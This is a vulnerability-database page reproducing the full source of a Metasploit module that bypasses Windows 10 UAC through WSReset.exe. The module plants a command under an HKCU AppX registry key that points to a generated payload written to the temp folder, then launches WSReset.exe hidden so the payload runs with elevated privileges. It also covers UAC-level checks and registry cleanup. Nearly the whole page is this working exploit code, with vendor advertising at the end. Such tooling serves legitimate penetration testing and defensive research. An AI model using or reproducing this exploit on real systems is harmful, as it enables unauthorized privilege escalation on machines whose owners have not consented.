Lucene search
K

Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry

🗓️ 05 Sep 2019 16:35:10Reported by ACTIVELabs, sailay1996, bwatters-r7Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 65 Views

Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry. Exploits flaw in WSReset.exe linked to Windows Store, allowing autoelevate privs to run binary from low-privilege registry location

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ManualRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Post::Windows::Priv
  include Post::Windows::Runas

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry',
        'Description' => %q{
          This module exploits a flaw in the WSReset.exe file associated with the Windows
          Store.  This binary has autoelevate privs, and it will run a binary file
          contained in a low-privilege registry location.  By placing a link to
          the binary in the registry location, WSReset.exe will launch the binary as
          a privileged user.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'ACTIVELabs',   # discovery
          'sailay1996',   # poc
          'bwatters-r7',  # metasploit module
        ],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Targets' => [[ 'Automatic', {} ]],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'WfsDelay' => 15
        },
        'DisclosureDate' => '2019-02-19',
        'Notes' => {
          'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ]
        },
        'References' => [
          ['URL', 'https://www.activecyber.us/activelabs/windows-uac-bypass'],
          ['URL', 'https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html'],
          ['URL', 'https://github.com/sailay1996/UAC_bypass_windows_store'],
        ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_sys_config_getenv
              stdapi_sys_process_execute
            ]
          }
        }
      )
    )
    register_options(
      [OptString.new('PAYLOAD_NAME', [false, 'The filename to use for the payload binary (%RAND% by default).', nil])]
    )
  end

  def check
    version = get_version_info
    if version.build_number >= Msf::WindowsVersion::Win10_InitialRelease && !version.windows_server? && is_uac_enabled? && exists?('C:\\Windows\\System32\\WSReset.exe')
      return CheckCode::Appears
    end

    CheckCode::Safe
  end

  def exploit
    @registry_key = ''
    check_permissions!
    case get_uac_level
    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
      UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
      UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
      fail_with(Failure::NotVulnerable,
                "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
    when UAC_DEFAULT
      print_good('UAC is set to Default')
      print_good('BypassUAC can bypass this setting, continuing...')
    when UAC_NO_PROMPT
      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
      shell_execute_exe
      return
    end

    # get directory locations straight
    win_dir = session.sys.config.getenv('windir')
    vprint_status('win_dir = ' + win_dir)
    tmp_dir = session.sys.config.getenv('tmp')
    vprint_status('tmp_dir = ' + tmp_dir)
    exploit_dir = win_dir + '\\System32\\'
    vprint_status('exploit_dir = ' + exploit_dir)
    reset_filepath = exploit_dir + 'WSReset.exe'
    vprint_status('exploit_file = ' + reset_filepath)

    # make payload
    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(rand(6..13)) + '.exe'
    payload_pathname = tmp_dir + '\\' + payload_name
    vprint_status('payload_pathname = ' + payload_pathname)
    vprint_status('Making Payload')
    payload = generate_payload_exe
    reg_command = exploit_dir + "cmd.exe /c start #{payload_pathname}"
    vprint_status("reg_command = " + reg_command)
    @registry_key = 'HKCU\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command'

    # make registry changes
    vprint_status("Making Registry Changes")
    begin
      registry_createkey(@registry_key)
      registry_setvaldata(@registry_key, 'DelegateExecute', '', 'REG_SZ')
      registry_setvaldata(@registry_key, '', reg_command, 'REG_SZ')
    rescue ::Exception => e
      print_error(e.to_s)
    end
    vprint_status('Registry Changes Complete')
    # Upload payload
    vprint_status("Uploading Payload to #{payload_pathname}")
    write_file(payload_pathname, payload)
    vprint_status('Payload Upload Complete')

    vprint_status('Launching ' + reset_filepath)
    begin
      session.sys.process.execute("cmd.exe /c \"#{reset_filepath}\"", nil, 'Hidden' => true)
    rescue ::Exception => e
      print_error(e.to_s)
    end
    print_warning("This exploit requires manual cleanup of '#{payload_pathname}'")
  end

  def cleanup
    if @registry_key.present?
    vprint_status('Removing Registry Changes')
      registry_deletekey(@registry_key)
    vprint_status('Registry Changes Removed')
    end
  end

  def check_permissions!
    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end
    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
    # Check if you are an admin
    # is_in_admin_group can be nil, true, or false
    print_status('UAC is Enabled, checking level...')
    vprint_status('Checking admin status...')
    admin_group = is_in_admin_group?
    if admin_group.nil?
      print_error('Either whoami is not there or failed to execute')
      print_error('Continuing under assumption you already checked...')
    elsif admin_group
      print_good('Part of Administrators group! Continuing...')
    else
      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
    end

    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation